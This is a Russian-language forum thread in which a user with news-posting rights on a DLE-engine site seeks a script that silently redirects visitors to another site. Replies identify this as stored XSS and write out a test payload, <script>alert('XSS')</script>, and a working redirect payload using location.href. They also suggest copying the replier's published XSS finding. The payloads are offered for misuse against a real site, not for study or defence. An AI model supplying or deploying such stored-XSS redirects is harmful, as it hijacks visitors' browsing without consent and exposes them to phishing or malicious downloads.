Короче год назад мне друг хороший дал скрипт, вставляешь его в новость на DLE сайт и перекидывает на сайт который ты указал. Скрипт утерял. Друг в Армии... ( .... Может есть у кого? Куплю.
то что ты описал называеться активная XSS + редирект и работает только там где можеш найти активку а не на всех подряд сайтах
На том сайте где я хочу это сделать этот скрипт работал всегда. У вас его нет? Там код, он не большой по моему.....очень нужен.
только для начала проверь есть ли xss вставь этот скрипт <script>alert("XSS")</script> и уж если есть алерт то используй тот который ниже <script>location.href='http://адрессайта'</script>
Ты меня не так понял. Я на сайте журналист, могу только новости добавлять. Дак вот надо в новость такой код чтобы если допустим новость на главной и человек зашел на главную то его сра3у перекидывало на сайт который прописан в коде.
Все правильно я понял- тебе нужна активная XSS только с ней можно кидать на страници без желания юзера (если ты не админ и нет доступа чтоб код подправить в сайте)
Ну если тк че то ниче не получается то как сделать такое? http://downloads.ru/win/2600.hts Чтобы на главной с мои текстом выскакивало!
Это активная XSS и есть она в очень немногих движках. Посмотри мою активку в уязвимостях, можно аналогичное сделать (но нужны "особые условия" вроде висивига)
